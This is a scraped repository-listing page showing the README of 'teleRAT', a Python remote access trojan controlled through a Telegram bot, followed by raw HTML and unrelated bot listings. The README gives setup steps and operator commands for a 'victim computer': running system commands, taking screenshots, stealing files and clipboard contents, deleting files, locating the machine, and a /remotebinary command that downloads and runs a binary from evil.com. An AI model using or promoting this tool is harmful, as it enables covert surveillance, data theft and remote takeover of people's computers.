Telegram RAT written in Python

Related tags

Third-party APIs Wrappers python malware rat malware-research remote-admin-tool
Overview

teleRAT

Python based RAT that uses Telegram for sending commands and receiving data to and from a victim computer.

Setup.py

  1. Insert your API key into the api variable inside the setup.py script & run it. This will setup your Telegram chat with your created bot with the necessary commands to avoid inserting each command along with the help message.
  • Read here to create your own bot and obtain your API token.
  1. Install necessary requirements: pip install -r requirements.txt
  2. Send a command to your Telegram bot
  3. Run python3 main.py

Available Commands

  • /whoami - returns username. no additional arguments required.
  • /screenshot - takes screenshots. requires the number of screenshots to take (EX: /screenshot 5 <- to take 5 screenshots)
  • /location - returns location info (region, state, zip code, estimated coordinates, timezone, country, ip address)
  • /metadata - returns metadata info about a specified file. requires filepath as an additional argument (EX: /metadata C:\Users\Username\Files\special.java <- will return metadata info about special.java)
  • /execute - executes specified system command. requires 2 additional arguments: the system command and additional arguments to pass to that system command (EX: /execute cmd.exe [/c,ver] or /execute binary.exe none} in order to execute binary.exe with no arguments)
  • /power - allows operator to shutoff, hibernate, or restart computer. requires 1 additional argument: hibernate, pd (to power down), or restart (EX: /power pd <- to power down the victim's computer)
  • /ls - provides operator with directory listing. If no additional argument is provided, it provides directory listing for directory in which malware is. Additional argument of a directory is optional (EX: /ls %APPDATA% <- provides directory listing for APPDATA directory)
  • /delete - deletes a user specified file. Additional argument of filepath is required (EX: /delete C:\Users\Username\Files\temp.txt <- deletes a file named temp.txt)
  • /wreport - provides information regarding the wireless profiles the computer has connected to in the past, the drivers, and a list of wireless interfaces.
  • /remotebinary - download and execute a remote binary. Requires 2 additional arguments: the URL where the binary is and any additional arguments to pass when executing the binary (EX: /remotebinary https://evil.com/file.exe noargs <- execute file.exe with no arguments or /remotebinary https://evil.com/file.exe [-c,-f] <- to execute file.exe with flags c & f)
  • /processes - returns a list of running processes and services
  • /gather - return a specified file. requires 1 additional argument: the filepath (EX: /gather C:\Users\username\important\file.xlsx <- grab and upload file.xlsx to Telegram chat)
  • /report - provides a hardware report & Windows version to operator
  • /playnoise - plays a user specified noise. available list of noises include: asterisk sound (asterisk), exclamation sound (exclamation), exit sound (exit), hand sound (hand), question sound (question), and beep (beep) (EX: /playnoise beep or /playnoise question)
  • /gatherclip - returns data currently copied in the victim's clipboard. requires no additional arguments.
  • /messagebox - will present the victim with a message box. 2 additional arguments are required: caption and title for the window (EX: /messagebox </li> </ul> </article> </div> </div> </div> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-format="autorelaxed" data-ad-client="ca-pub-7963911354665843" data-ad-slot="9109096810"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <div id="issues" class="card mt-3"> <div class="card-header"><h5>You might also like...</h5></div> <div class="card-body"> <div class="review-list"> <a href="/repo/abinasherz939-ubuntubot-python-third-party-apis-wrappers"> <img class="lazy img-fluid " alt="Slam Mirror Bot is a multipurpose Telegram Bot written in Python for mirroring files on the Internet to our beloved Google Drive." data-original="https://camo.githubusercontent.com/2fbe515d91880421a99470e612395664427aa90954154d4b484537dfe651ed4e/68747470733a2f2f74656c656772612e70682f66696c652f3134333033326539363534326537353334663037332e6a7067" > </a> <div class="card-body"> <a href="/repo/abinasherz939-ubuntubot-python-third-party-apis-wrappers"><h5 class="carhd card-title text-dark">Slam Mirror Bot is a multipurpose Telegram Bot written in Python for mirroring files on the Internet to our beloved Google Drive.</h5></a> <p class="card-text"> Slam Mirror Bot is a multipurpose Telegram Bot written in Python for mirroring files on the Internet to our beloved Google Drive.</p> </div> <div class="card-footer text-muted"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 14%" data-original="https://avatars.githubusercontent.com/u/56243353?v=4&s=60" alt="Abinash939" > <i class="fa fa-star ml-2" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-2" aria-hidden="true"></i> Oct 10, 2021 </div> <div class="card-body"> <a href="/repo/iamLiquidX-MirLeechX-python-third-party-apis-wrappers"><h5 class="carhd card-title text-dark">A Telegram Bot written in Python for mirroring files on the Internet to your Google Drive</h5></a> <p class="card-text"> No support is going to be provided of any kind, only maintaining this for vps user on request. This is a Telegram Bot written in Python for mirroring </p> </div> <div class="card-footer text-muted"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 14%" data-original="https://avatars.githubusercontent.com/u/66400864?v=4&s=60" alt="Sunil Kumar" > <i class="fa fa-star ml-2" aria-hidden="true"></i> 42 <i class="fa fa-clock-o ml-2" aria-hidden="true"></i> Oct 28, 2022 </div> <div class="card-body"> <a href="/repo/Sukumar24-GroupManagerBot-python-third-party-apis-wrappers"><h5 class="carhd card-title text-dark"> Telegram Group Manager Bot + Userbot Written In Python Using Pyrogram. </h5></a> <p class="card-text"> Telegram Group Manager Bot + Userbot Written In Python Using PyrogramTelegram Group Manager Bot + Userbot Written In Python Using Pyrogram</p> </div> <div class="card-footer text-muted"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 14%" data-original="https://avatars.githubusercontent.com/u/93417462?v=4&s=60" alt="null" > <i class="fa fa-star ml-2" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-2" aria-hidden="true"></i> Nov 11, 2021 </div> <div class="card-body"> <a href="/repo/Fahad65edu-ALLFather_BOT1-python-third-party-apis-wrappers"><h5 class="carhd card-title text-dark">A Telegram Bot written in Python for mirroring files on the Internet to Google Drive</h5></a> <p class="card-text"> No support is going to be provided of any kind, only maintaining this for vps user on request. This is a Telegram Bot written in Python for mirroring </p> </div> <div class="card-footer text-muted"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 14%" data-original="https://avatars.githubusercontent.com/u/92245201?v=4&s=60" alt="null" > <i class="fa fa-star ml-2" aria-hidden="true"></i> 0 <i class="fa fa-clock-o ml-2" aria-hidden="true"></i> Dec 26, 2021 </div> <a href="/repo/stehack27-Telegram-Contact-Bot-python-third-party-apis-wrappers"> <img class="lazy img-fluid " alt="Simple contact bot for telegram, written in python." data-original="https://camo.githubusercontent.com/b9cc7b8569832369175dd3e21956b65135961f5b006f7f9fc9a4c0893769f519/68747470733a2f2f692e696d6775722e636f6d2f306b764e5172592e706e67" > </a> <div class="card-body"> <a href="/repo/stehack27-Telegram-Contact-Bot-python-third-party-apis-wrappers"><h5 class="carhd card-title text-dark">Simple contact bot for telegram, written in python.</h5></a> <p class="card-text"> 🔗 | Install Install the requirements with pip install -r requirements.txt 📋 | Setup Get your token from BotFather Get your UserId with Nicegram or w</p> </div> <div class="card-footer text-muted"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 14%" data-original="https://avatars.githubusercontent.com/u/82880802?v=4&s=60" alt="Stehack" > <i class="fa fa-star ml-2" aria-hidden="true"></i> 3 <i class="fa fa-clock-o ml-2" aria-hidden="true"></i> Dec 10, 2022 </div> <a href="/repo/NotReallyShikhar-YukkiMusicBot-python-third-party-apis-wrappers"> <img class="lazy img-fluid " alt="A Telegram Music Bot with proper functions written in Python with Pyrogram and Py-Tgcalls." data-original="https://github.com/notreallyshikhar/YukkiMusicBot/raw/main/Utils/star.gif" > </a> <div class="card-body"> <a href="/repo/NotReallyShikhar-YukkiMusicBot-python-third-party-apis-wrappers"><h5 class="carhd card-title text-dark">A Telegram Music Bot with proper functions written in Python with Pyrogram and Py-Tgcalls.</h5></a> <p class="card-text"> ⭐️ Yukki Music Bot ⭐️ A Telegram Music Bot written in Python using Pyrogram and Py-Tgcalls Ready to use method A Support Group and ready-to-use runnin</p> </div> <div class="card-footer text-muted"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 14%" data-original="https://avatars.githubusercontent.com/u/63592764?v=4&s=60" alt="Shikhar Kumar" > <i class="fa fa-star ml-2" aria-hidden="true"></i> 1000 <i class="fa fa-clock-o ml-2" aria-hidden="true"></i> Jan 3, 2023 </div> <div class="card-body"> <a href="/repo/Oxidisedman-FakeDataGenerator"><h5 class="carhd card-title text-dark">A telegram bot for generate fake details. Written in python using telethon</h5></a> <p class="card-text"> FakeDataGenerator A telegram bot for generate fake details. Written in python using telethon. Mandatory variables API_HASH Get it from my telegram.org</p> </div> <div class="card-footer text-muted"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 14%" data-original="https://avatars.githubusercontent.com/u/72887386?v=4&s=60" alt="Oxidised-Man " > <i class="fa fa-star ml-2" aria-hidden="true"></i> 6 <i class="fa fa-clock-o ml-2" aria-hidden="true"></i> Dec 19, 2021 </div> <div class="card-body"> <a href="/repo/M-fazin-Password-Generator-Bot-python-third-party-apis-wrappers"><h5 class="carhd card-title text-dark">A Simple Telegram Bot That Can Generate Strong Password With Many Features Written In Python Using Pyrogram</h5></a> <p class="card-text"> Password-Generator-Bot A Simple Telegram Bot That Can Generate Strong Password With Many Features Written In Python Using Pyrogram Features Random Pas</p> </div> <div class="card-footer text-muted"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 14%" data-original="https://avatars.githubusercontent.com/u/86030159?v=4&s=60" alt="Muhammed Fazin" > <i class="fa fa-star ml-2" aria-hidden="true"></i> 17 <i class="fa fa-clock-o ml-2" aria-hidden="true"></i> Dec 23, 2022 </div> <a href="/repo/Wahyu213-OkaeriSpamProtection"> <img class="lazy img-fluid " alt="Anti Spam/NSFW Telegram Bot Written In Python With Pyrogram." data-original="https://camo.githubusercontent.com/f5e72c18d16bda393a30920dbdc18fb24b10f46bec40a4c8894e4f4b49d60d11/68747470733a2f2f74656c656772612e70682f66696c652f3533396436373238353236366538346634623439622e6a7067" > </a> <div class="card-body"> <a href="/repo/Wahyu213-OkaeriSpamProtection"><h5 class="carhd card-title text-dark">Anti Spam/NSFW Telegram Bot Written In Python With Pyrogram.</h5></a> <p class="card-text"> Anti Spam/NSFW Telegram Bot Written In Python With Pyrogram.</p> </div> <div class="card-footer text-muted"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 14%" data-original="https://avatars.githubusercontent.com/u/91831925?v=4&s=60" alt="Wahyusaputra" > <i class="fa fa-star ml-2" aria-hidden="true"></i> 2 <i class="fa fa-clock-o ml-2" aria-hidden="true"></i> Dec 29, 2021 </div> </div> </div> </div> </div> <div class="col-lg-4 right"> <div id="basic" class="tab-pane fade show active"> <div class="box shadow-sm rounded bg-white mb-3"> <div class="box-title border-bottom p-3"> <h6 class="m-0">Owner </h6> </div> <div class="d-flex align-items-center p-3 job-item-header"> <div class="overflow-hidden mr-2"> <h6 class="font-weight-bold -dark mb-0 text-truncate"> </h6> <div class="small text-gray-500"> </div> </div> <img class="img-fluid ml-auto" style="border-radius: 50%;" src="https://avatars.githubusercontent.com/u/56985822?v=4&s=60" alt="null"> </div> <div class="box-body p-3"> <a href="https://github.com/1d8/teleRAT" rel="nofollow" target="_blank" class="btn btn-lg btn-block btn-info mb-3"><i class="fa fa-github" aria-hidden="true"></i> GitHub </a> </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/onlyweabo-Daxcez-mirror-leech-telegram-bot"><h6 class="font-weight-bold ">Daxcez-mirror-leech-telegram-bot - A Telegram Bot written in Python for mirroring files on the Internet to your Google Drive or Telegram</h6></a> <p class="mb-0 text-muted">This is a Telegram Bot written in Python for mirroring files on the Internet to </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 15%" data-original="https://avatars.githubusercontent.com/u/84113303?v=4&s=40" alt="null" > <i class="fa fa-star ml-3" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Feb 18, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/tatasurarta-awanmirror2bot"><h6 class="font-weight-bold ">A Telegram Bot written in Python for mirroring files on the Internet to your Google Drive or Telegram</h6></a> <p class="mb-0 text-muted">Original Repo mirror-leech-telegram-bot This is a Telegram Bot written in Python for mirroring files on the Internet to your Google Drive or Telegram.</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 15%" data-original="https://avatars.githubusercontent.com/u/91466068?v=4&s=40" alt="null" > <i class="fa fa-star ml-3" aria-hidden="true"></i> 0 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 3, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/ZauteKm-VCVideoPlayBot-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Telegram bot to stream videos in telegram voicechat for both groups and channels. Supports live strams, YouTube videos and telegram media.</h6></a> <p class="mb-0 text-muted">Telegram VCVideoPlayBot An Telegram Bot By @ZauteKm To Stream Videos in Telegram Voice Chat. NOTE: Make sure you have started a VoiceChat in your Grou</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 15%" data-original="https://avatars.githubusercontent.com/u/77600757?v=4&s=40" alt="Zaute" > <i class="fa fa-star ml-3" aria-hidden="true"></i> 20 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 21, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/subinps-VCPlayerBot-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Telegram bot to stream videos in telegram voicechat for both groups and channels. Supports live strams, YouTube videos and telegram media.</h6></a> <p class="mb-0 text-muted">Telegram bot to stream videos in telegram voicechat for both groups and channels. Supports live strams, YouTube videos and telegram media.</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 15%" data-original="https://avatars.githubusercontent.com/u/64341611?v=4&s=40" alt="SUBIN" > <i class="fa fa-star ml-3" aria-hidden="true"></i> 449 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 27, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Wahyu213-VCPlayerBot"><h6 class="font-weight-bold ">VCPlayerBot - Telegram bot to stream videos in telegram voicechat for both groups and channels. Supports live steams, YouTube videos and telegram media</h6></a> <p class="mb-0 text-muted">VCPlayerBot Telegram bot to stream videos in telegram voicechat for both groups </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 15%" data-original="https://avatars.githubusercontent.com/u/91831925?v=4&s=40" alt="Wahyusaputra" > <i class="fa fa-star ml-3" aria-hidden="true"></i> 3 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Feb 22, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/bagasf2002-bagas-mirrorleech_bot-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Bagas Mirror&Leech Bot is a multipurpose Telegram Bot written in Python for mirroring files on the Internet to our beloved Google Drive. Based on python-aria-mirror-bot</h6></a> <p class="mb-0 text-muted">- [ MAYBE UPDATE & ADD MORE MODULE ] Bagas Mirror&Leech Bot Bagas Mirror&Leech Bot is a multipurpose Telegram Bot written in Python for mirroring file</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 15%" data-original="https://avatars.githubusercontent.com/u/88070476?v=4&s=40" alt="null" > <i class="fa fa-star ml-3" aria-hidden="true"></i> 4 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 23, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/ExposedCat-Meowgram"><h6 class="font-weight-bold ">Telegram client written in GTK & Python</h6></a> <p class="mb-0 text-muted">Meowgram GTK Telegram Client ?? Why Meogram? Meowgram = Meow + Gram :D Meow - Talking cats sound. It's a symbol of unique and user friendly UI of clie</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 15%" data-original="https://avatars.githubusercontent.com/u/44642024?v=4&s=40" alt="Artem Prokop" > <i class="fa fa-star ml-3" aria-hidden="true"></i> 71 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> May 4, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/TheHamkerCat-SpamProtectionRobot"><h6 class="font-weight-bold ">Anti Spam/NSFW Telegram Bot Written In Python With Pyrogram.</h6></a> <p class="mb-0 text-muted">✨ SpamProtectionRobot ✨ Anti Spam/NSFW Telegram Bot Written In Python With Pyrogram. Requirements Python >= 3.7 Install Locally Or On A VPS $ git clon</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 15%" data-original="https://avatars.githubusercontent.com/u/58004714?v=4&s=40" alt="Akshay Rajput" > <i class="fa fa-star ml-3" aria-hidden="true"></i> 46 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 13, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/surfranch-TelegramShillBot"><h6 class="font-weight-bold ">A simple Telegram bot, written in Python, that you can use to shill (i.e. send messages) your token, or whatever, to channels.</h6></a> <p class="mb-0 text-muted">Telegram Shill Bot Ever wanted a Shill Bot but wankers keep scamming for one OR wanted to charge you an arm and a leg? This is a simple bot written in</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 15%" data-original="https://avatars.githubusercontent.com/u/88326799?v=4&s=40" alt="null" > <i class="fa fa-star ml-3" aria-hidden="true"></i> 53 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 25, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/VegetaxD-VideoStreamBot"><h6 class="font-weight-bold ">A Video Streaming Telegram Bot written in Python with Pyrogram and PyTgcalls</h6></a> <p class="mb-0 text-muted">Video Stream Bot A Video Streaming Telegram Bot written in Python using Pyrogram and PyTgcalls Requirements Python 3.9 Telegram API Telegram Bot Token</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%;max-width: 15%" data-original="https://avatars.githubusercontent.com/u/77937681?v=4&s=40" alt="Aarav Arora" > <i class="fa fa-star ml-3" aria-hidden="true"></i> 61 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 10, 2022 </div> </div> </div> </div> </div> </div> <!-- footer --> <footer class="bg-white"> <div class="container"> <div class="copyright"> <div class="logo"> <a href="/"> <img src="/assets/images/logo_pythonrepo.png"> </a> </div> <p>2022.PythonRepo </p> </div> </div> </footer> <!-- footer--> <!-- Bootstrap core JavaScript --> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js" integrity="sha512-bnIvzh6FU75ZKxp0GXLH9bewza/OIw6dLVh9ICg0gogclmYGguQJWl8U30WpbsGTqbIiAwxTsbe76DErLq5EDQ==" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/js/bootstrap.bundle.min.js" integrity="sha512-Oy5BruJdE3gP9+LMJ11kC5nErkh3p4Y0GawT1Jrcez4RTDxODf3M/KP3pEsgeOYxWejqy2SPnj+QMpgtvhDciQ==" crossorigin="anonymous"></script> <!-- select2 Js --> <script src="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.13/js/select2.min.js" integrity="sha512-2ImtlRlf2VVmiGZsjm9bEyhjGW4dU7B6TNwh/hx/iSByxNENtj3WVE6o/9Lj4TJeVXPi4bnOIMXFIJJAeufa0A==" crossorigin="anonymous"></script> <!-- Custom --> <script src="/assets/js/custom.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script> <script> $(function() { $("img.lazy").lazyload({ threshold :180, failurelimit :20, effect : "fadeIn" }); }); </script> <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.5.0/highlight.min.js"></script> <script> hljs.initHighlightingOnLoad(); </script> </body> </html><script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="7233a3d19f5f6309c605d9a7-|49" defer></script>